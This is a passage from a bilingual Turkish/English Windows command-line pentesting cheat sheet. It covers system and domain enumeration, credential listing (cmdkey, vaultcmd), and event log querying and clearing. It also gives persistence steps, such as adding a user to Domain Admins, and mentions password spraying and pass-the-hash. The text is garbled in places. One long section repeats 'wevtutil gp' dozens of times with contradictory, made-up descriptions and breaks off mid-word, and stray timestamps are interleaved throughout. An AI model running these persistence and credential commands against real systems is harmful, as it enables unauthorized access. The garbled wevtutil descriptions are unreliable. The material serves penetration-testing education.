2024-02-10 18:14:16 +00:00
```plaintext
rmdir < directory >
```
2024-04-06 19:40:41 +00:00
**Copy File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Kopyala**
2024-02-10 18:14:16 +00:00
```plaintext
copy < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Move File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Taşı **
2024-02-10 18:14:16 +00:00
```plaintext
move < source > < destination >
```
2024-04-06 19:40:41 +00:00
**Delete File**
2024-02-10 18:14:16 +00:00
2024-04-06 19:40:41 +00:00
**Dosya Sil**
2024-02-10 18:14:16 +00:00
```plaintext
del < file >
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
set #List all environment variables
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
Vurgulanması gereken bazı çevre değişkenleri:
* **COMPUTERNAME**: Bilgisayarı n adı
* **TEMP/TMP:** Geçici klasör
* **USERNAME:** Kullanı cı adı nı z
* **HOMEPATH/USERPROFILE:** Ana dizin
* **windir:** C:\Windows
* **OS**: Windows İşletim Sistemi
* **LOGONSERVER**: Alan denetleyicisinin adı
* **USERDNSDOMAIN**: DNS ile kullanı lacak alan adı
* **USERDOMAIN**: Alanı n adı
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Bağlı Diskler
Mounted disks are additional storage devices that are connected to a computer system and made accessible for use. These disks can be physical devices such as hard drives or solid-state drives, or they can be virtual disks created within a virtual machine environment.
Bağlı diskler, bir bilgisayar sistemiyle bağlantı kurulan ve kullanı ma açı lan ek depolama cihazları dı r. Bu diskler, sabit diskler veya katı hal sürücüleri gibi fiziksel cihazlar olabilir veya sanal bir makine ortamı nda oluşturulan sanal diskler olabilir.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```
2024-04-06 19:40:41 +00:00
### [Defender](authentication-credentials-uac-and-efs/#defender)
2024-02-10 18:14:16 +00:00
### Geri Dönüşüm Kutusu
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
dir C:\$Recycle.Bin /s /b
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### İşlemler, Hizmetler ve Yazı lı mlar
#### İşlemler (Processes)
Windows işletim sisteminde çalı şan işlemleri listelemek için aşağı daki komutları kullanabilirsiniz:
```plaintext
tasklist
```
Belirli bir işlemi sonlandı rmak için ise aşağı daki komutu kullanabilirsiniz:
```plaintext
taskkill /IM < process_name >
```
#### Hizmetler (Services)
Windows hizmetlerini yönetmek için aşağı daki komutları kullanabilirsiniz:
```plaintext
sc query
```
Belirli bir hizmeti başlatmak veya durdurmak için ise aşağı daki komutları kullanabilirsiniz:
```plaintext
sc start < service_name >
sc stop < service_name >
```
#### Yazı lı mlar (Software)
Windows işletim sisteminde yüklü olan yazı lı mları listelemek için aşağı daki komutu kullanabilirsiniz:
```plaintext
wmic product get name,version
```
Bu komut, yüklü olan yazı lı mları n adı nı ve sürümünü listeleyecektir.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
## Alan Adı Bilgisi
### `whoami`
Bu komut, mevcut kullanı cı hakkı nda bilgi sağlar.
### `hostname`
Bu komut, bilgisayarı n adı nı veya alan adı nı gösterir.
### `ipconfig /all`
Bu komut, ağ bağlantı ları nı n ayrı ntı lı bilgilerini gösterir.
### `net user`
Bu komut, mevcut kullanı cı hesapları nı n listesini gösterir.
### `net group`
Bu komut, mevcut grup hesapları nı n listesini gösterir.
### `net localgroup`
Bu komut, mevcut yerel grup hesapları nı n listesini gösterir.
### `net view`
Bu komut, ağdaki kaynakları n listesini gösterir.
### `net share`
Bu komut, paylaşı lan kaynakları n listesini gösterir.
### `netstat -ano`
Bu komut, ağ bağlantı ları nı n ve portları n durumunu gösterir.
### `route print`
Bu komut, ağ yönlendirme tablosunu gösterir.
### `arp -a`
Bu komut, ARP önbelleğini gösterir.
### `nslookup`
Bu komut, DNS sorguları nı gerçekleştirir.
### `systeminfo`
Bu komut, sistem hakkı nda ayrı ntı lı bilgiler sağlar.
### `tasklist`
Bu komut, çalı şan işlemlerin listesini gösterir.
### `taskkill`
Bu komut, belirli bir işlemi sonlandı rı r.
### `schtasks /query`
Bu komut, zamanlanmı ş görevlerin listesini gösterir.
### `schtasks /delete`
Bu komut, belirli bir zamanlanmı ş görevi siler.
### `reg query`
Bu komut, kayı t defteri anahtarları nı ve değerlerini gösterir.
### `reg add`
Bu komut, kayı t defterine yeni bir anahtar veya değer ekler.
### `reg delete`
Bu komut, kayı t defterinden bir anahtar veya değeri siler.
### `reg load`
Bu komut, kayı t defterinden bir yedekleme dosyası nı yükler.
### `reg unload`
Bu komut, kayı t defterinden bir yedekleme dosyası nı kaldı rı r.
### `reg save`
Bu komut, kayı t defterini bir yedekleme dosyası na kaydeder.
### `reg restore`
Bu komut, kayı t defterini bir yedekleme dosyası ndan geri yükler.
### `wevtutil qe`
Bu komut, olay günlüklerini sorgular.
### `wevtutil cl`
Bu komut, belirli bir olay günlüğünü temizler.
### `wevtutil el`
Bu komut, mevcut olay günlüklerinin listesini gösterir.
### `wevtutil gli`
Bu komut, belirli bir olay günlüğünün ayrı ntı ları nı gösterir.
### `wevtutil sl`
Bu komut, olay günlüğü aboneliklerini listeler.
### `wevtutil im`
Bu komut, olay günlüğü aboneliklerini içe aktarı r.
### `wevtutil um`
Bu komut, olay günlüğü aboneliklerini kaldı rı r.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan alı r.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaldı rı r.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan yedekler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan kaydeder.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan geri yükler.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan uygular.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları ndan sı fı rlar.
### `wevtutil gp`
Bu komut, olay günlüğü aboneliklerini grup politikaları na yedekler.
### `wevtutil gp`
Bu komut, olay günlüğ
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user < ACCOUNT_NAME > /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:< DOMAIN > #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Günlükler ve Olaylar
Windows işletim sistemi, çeşitli günlükler ve olaylar aracı lı ğı yla sistem aktivitelerini kaydeder. Bu günlükler ve olaylar, bir pentester için değerli bilgiler sağlayabilir ve hedef sistemin zayı f noktaları nı belirlemeye yardı mcı olabilir.
#### Windows Günlükleri
Windows işletim sistemi, çeşitli günlükleri kullanarak sistem aktivitelerini kaydeder. Bu günlükler, olayları n türüne ve önemine bağlı olarak farklı kategorilere ayrı lı r. İşte bazı yaygı n Windows günlükleri:
2024-04-06 19:40:41 +00:00
* **Uygulama Günlüğü**: Uygulamaları n çalı şması yla ilgili bilgileri kaydeder.
* **Güvenlik Günlüğü**: Güvenlik olayları nı kaydeder, örneğin başarı sı z oturum açma denemeleri veya yetkisiz erişim girişimleri.
* **Sistem Günlüğü**: Sistemle ilgili önemli olayları kaydeder, örneğin sistem hataları veya donanı m sorunları .
* **DNS Günlüğü**: DNS sorguları nı ve yanı tları nı kaydeder.
* **Günlük Hizmeti**: Diğer günlükleri toplar ve yönetir.
2024-02-10 18:14:16 +00:00
#### Olay Görüntüleyici
Windows işletim sistemi, Olay Görüntüleyici adlı bir araç sağlar. Olay Görüntüleyici, sistem günlüklerini görüntülemek ve analiz etmek için kullanı lı r. Aşağı da, Olay Görüntüleyici'nin kullanı mı yla ilgili bazı temel komutlar bulunmaktadı r:
2024-04-06 19:40:41 +00:00
* **eventvwr**: Olay Görüntüleyici'yi açar.
* **eventvwr.msc /s**: Uzak bir bilgisayardaki Olay Görüntüleyici'yi açar.
* **eventvwr.msc /c**: Olay Görüntüleyici'yi yönetici olarak açar.
2024-02-10 18:14:16 +00:00
#### Olay İzleme
Olay İzleme, belirli bir olayı n gerçekleştiğinde tetiklenen bir eylem gerçekleştirmek için kullanı lı r. Olay İzleme, PowerShell veya Komut İstemi aracı lı ğı yla yapı landı rı labilir. İşte Olay İzleme ile ilgili bazı temel komutlar:
2024-04-06 19:40:41 +00:00
* **wevtutil**: Olay İzleme hizmetini yönetmek için kullanı lı r.
* **wevtutil qe**: Belirli bir günlüğü sorgular.
* **wevtutil gli**: Belirli bir günlüğün ayrı ntı ları nı görüntüler.
* **wevtutil el**: Mevcut günlükleri listeler.
2024-02-10 18:14:16 +00:00
Bu temel komutlar, bir pentester'ı n Windows işletim sistemi üzerinde günlükleri ve olayları analiz etmesine yardı mcı olabilir.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
#### List Users
To list all users on the system, you can use the following command:
```plaintext
net user
```
#### Create User
To create a new user, you can use the following command:
```plaintext
net user < username > < password > /add
```
#### Delete User
To delete a user, you can use the following command:
```plaintext
net user < username > /delete
```
### Groups
#### List Groups
To list all groups on the system, you can use the following command:
```plaintext
net localgroup
```
#### Add User to Group
To add a user to a group, you can use the following command:
```plaintext
net localgroup < groupname > < username > /add
```
#### Remove User from Group
To remove a user from a group, you can use the following command:
```plaintext
net localgroup < groupname > < username > /delete
```
## Services
### List Services
To list all services on the system, you can use the following command:
```plaintext
sc query
```
### Start Service
To start a service, you can use the following command:
```plaintext
sc start < servicename >
```
### Stop Service
To stop a service, you can use the following command:
```plaintext
sc stop < servicename >
```
### Disable Service
To disable a service, you can use the following command:
```plaintext
sc config < servicename > start= disabled
```
### Enable Service
To enable a service, you can use the following command:
```plaintext
sc config < servicename > start= auto
```
## Firewall
### List Firewall Rules
To list all firewall rules, you can use the following command:
```plaintext
netsh advfirewall firewall show rule name=all
```
### Add Firewall Rule
To add a new firewall rule, you can use the following command:
```plaintext
netsh advfirewall firewall add rule name=< rulename > dir=in action=allow protocol=< protocol > localport=< port >
```
### Delete Firewall Rule
To delete a firewall rule, you can use the following command:
```plaintext
netsh advfirewall firewall delete rule name=< rulename >
```
## Registry
### Add Registry Key
To add a new registry key, you can use the following command:
```plaintext
reg add < keypath > /v < valuename > /t < datatype > /d < datavalue >
```
### Delete Registry Key
To delete a registry key, you can use the following command:
```plaintext
reg delete < keypath > /f
```
### Query Registry Key
To query a registry key, you can use the following command:
```plaintext
reg query < keypath >
```
### Modify Registry Key
To modify a registry key, you can use the following command:
```plaintext
reg add < keypath > /v < valuename > /t < datatype > /d < datavalue > /f
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Gruplar
Groups are a fundamental concept in Windows operating systems. They are used to organize and manage user accounts and provide access control to various resources. In this section, we will explore some basic commands related to groups that can be useful for pentesters.
#### List Groups
To list all the groups on a Windows system, you can use the `net localgroup` command. This command will display the names of all the groups along with their descriptions.
```plaintext
net localgroup
```
#### List Group Members
To list the members of a specific group, you can use the `net localgroup` command followed by the group name. This command will display the names of all the users and other groups that are members of the specified group.
```plaintext
net localgroup < group_name >
```
#### Add User to Group
To add a user to a specific group, you can use the `net localgroup` command followed by the group name and the username. This command will add the specified user to the specified group.
```plaintext
net localgroup < group_name > < username > /add
```
#### Remove User from Group
To remove a user from a specific group, you can use the `net localgroup` command followed by the group name and the username. This command will remove the specified user from the specified group.
```plaintext
net localgroup < group_name > < username > /delete
```
#### Create Group
To create a new group, you can use the `net localgroup` command followed by the group name and the /add option. This command will create a new group with the specified name.
```plaintext
net localgroup < group_name > /add
```
#### Delete Group
To delete a group, you can use the `net localgroup` command followed by the group name and the /delete option. This command will delete the specified group.
```plaintext
net localgroup < group_name > /delete
```
These are some basic commands related to groups in Windows. Understanding how groups work and how to manage them can be helpful for pentesters during their engagements.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain < domain_group_name > #Users that belongs to the group
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
To list active sessions, you can use the `query session` command. This command will display information about all active sessions on the Windows system.
```plaintext
C:\> query session
```
Bu komutu kullanarak etkin oturumları listeyebilirsiniz. Bu komut, Windows sistemdeki tüm etkin oturumlar hakkı nda bilgi gösterecektir.
```plaintext
C:\> query session
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```
qwinsta
klist sessions
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Parola Politikası
A strong password policy is essential for maintaining the security of a system. It helps to prevent unauthorized access and protects sensitive information. Here are some key points to consider when implementing a password policy:
2024-04-06 19:40:41 +00:00
* **Password Length**: Require passwords to be a minimum of 8 characters long. Longer passwords are generally more secure.
* **Complexity**: Passwords should include a combination of uppercase and lowercase letters, numbers, and special characters.
* **Password Expiration**: Set a policy that requires users to change their passwords regularly, such as every 90 days.
* **Password History**: Prevent users from reusing their previous passwords by enforcing a password history policy.
* **Account Lockout**: Implement an account lockout policy that temporarily locks an account after a certain number of failed login attempts.
* **Password Recovery**: Use secure methods for password recovery, such as security questions or email verification.
* **Education and Awareness**: Educate users about the importance of strong passwords and provide guidelines for creating and managing them.
2024-02-10 18:14:16 +00:00
By implementing a strong password policy, you can significantly enhance the security of your system and protect against unauthorized access.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```
net accounts
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Kimlik Bilgileri
Credentials (kimlik bilgileri), bir kullanı cı nı n kimliğini doğrulamak için kullanı lan bilgilerdir. Bu bilgiler, genellikle kullanı cı adı ve paroladan oluşur. Kimlik bilgileri, bir kullanı cı nı n yetkilendirilmiş erişim sağlaması na izin verir ve güvenliği sağlamak için gizli tutulmalı dı r.
#### Kullanı cı Adı ve Parola
Kullanı cı adı ve parola, en yaygı n kimlik bilgileri türüdür. Kullanı cı adı , bir kullanı cı nı n sistemdeki benzersiz tanı mlayı cı sı dı r. Parola ise kullanı cı nı n kimliğini doğrulamak için kullanı lan gizli bir dizedir. Güçlü bir parola seçmek, yetkisiz erişimi önlemek için önemlidir.
#### Diğer Kimlik Bilgileri Türleri
2024-04-06 19:40:41 +00:00
* Sertifika: Bir kullanı cı nı n kimliğini doğrulamak için kullanı lan dijital bir belgedir.
* Biyometrik Veriler: Parmak izi, yüz tanı ma veya retina taraması gibi fiziksel özelliklerin kullanı ldı ğı kimlik doğrulama yöntemidir.
* Anahtarlar: Kriptografik anahtarlar, kimlik doğrulama ve veri şifreleme için kullanı lı r.
* Tokenlar: Fiziksel veya sanal cihazlar aracı lı ğı yla kimlik doğrulama sağlayan küçük veri parçacı kları dı r.
2024-02-10 18:14:16 +00:00
Kimlik bilgilerinin güvenliği, kullanı cı ları n yetkisiz erişimden korunması nı sağlamak için büyük önem taşı r. Kullanı cı lar, güçlü parolalar kullanmalı , kimlik bilgilerini güvende tutmalı ve kimlik doğrulama yöntemlerini dikkatli bir şekilde seçmelidir.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
### Kullanı cı larla Kalı cı lı k
When performing a penetration test, it is important to establish persistence on the target system in order to maintain access even after the initial compromise. This can be achieved by creating a new user account or by leveraging existing user accounts with weak passwords.
Bir penetrasyon testi gerçekleştirirken, hedef sistemde erişimi sürdürebilmek için kalı cı lı k sağlamak önemlidir. Bu, yeni bir kullanı cı hesabı oluşturarak veya zayı f şifreleri olan mevcut kullanı cı hesapları nı kullanarak elde edilebilir.
#### Creating a New User Account
2024-04-06 19:40:41 +00:00
**Yeni Bir Kullanı cı Hesabı Oluşturma**
2024-02-10 18:14:16 +00:00
To create a new user account, you can use the `net user` command in the Windows command prompt. Here is the syntax:
Yeni bir kullanı cı hesabı oluşturmak için, Windows komut isteminde `net user` komutunu kullanabilirsiniz. İşte sözdizimi:
```plaintext
net user < username > < password > /add
```
Replace `<username>` with the desired username for the new account and `<password>` with the desired password. This will create a new user account with the specified username and password.
`<username>` yerine yeni hesap için istediğiniz kullanı cı adı nı , `<password>` ise istediğiniz şifreyi yazı n. Bu, belirtilen kullanı cı adı ve şifreyle yeni bir kullanı cı hesabı oluşturacaktı r.
#### Leveraging Existing User Accounts
2024-04-06 19:40:41 +00:00
**Mevcut Kullanı cı Hesapları nı Kullanma**
2024-02-10 18:14:16 +00:00
If you have access to an existing user account with weak password, you can use it to establish persistence. Here are some techniques you can use:
Zayı f bir şifreye sahip mevcut bir kullanı cı hesabı na erişiminiz varsa, kalı cı lı k sağlamak için bunu kullanabilirsiniz. İşte kullanabileceğiniz bazı teknikler:
2024-04-06 19:40:41 +00:00
* **Password Spraying**: Password spraying involves trying a small number of commonly used passwords against multiple user accounts. This can be done using tools like `Hydra` or `Burp Suite Intruder` .
* **Şifre Sı çratma**: Şifre sı çratma, birkaç yaygı n olarak kullanı lan şifreyi birden fazla kullanı cı hesabı na karşı denemeyi içerir. Bu, `Hydra` veya `Burp Suite Intruder` gibi araçlar kullanı larak yapı labilir.
* **Password Cracking**: If you have access to the password hashes of user accounts, you can use password cracking tools like `John the Ripper` or `Hashcat` to crack the passwords.
* **Şifre Kı rma**: Kullanı cı hesapları nı n şifre karma değerlerine erişiminiz varsa, `John the Ripper` veya `Hashcat` gibi şifre kı rma araçları nı kullanarak şifreleri kı rabilirsiniz.
* **Pass-the-Hash**: Pass-the-Hash is a technique where you use the NTLM hash of a user's password to authenticate as that user without knowing the actual password. Tools like `Mimikatz` can be used for pass-the-hash attacks.
* **Pass-the-Hash**: Pass-the-Hash, bir kullanı cı nı n NTLM karma değerini kullanarak gerçek şifreyi bilmeden o kullanı cı olarak kimlik doğrulama yapma tekniğidir. `Mimikatz` gibi araçlar, pass-the-hash saldı rı ları için kullanı labilir.
2024-02-10 18:14:16 +00:00
By leveraging existing user accounts, you can maintain persistence on the target system and continue to access it even if the initial compromise is detected and remediated.
Mevcut kullanı cı hesapları nı kullanarak, hedef sistemde kalı cı lı ğı sürdürebilir ve başlangı çta tespit edilen ve giderilen bir saldı rı durumunda bile erişime devam edebilirsiniz.
2024-04-06 19:40:41 +00:00
2024-02-10 18:14:16 +00:00
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
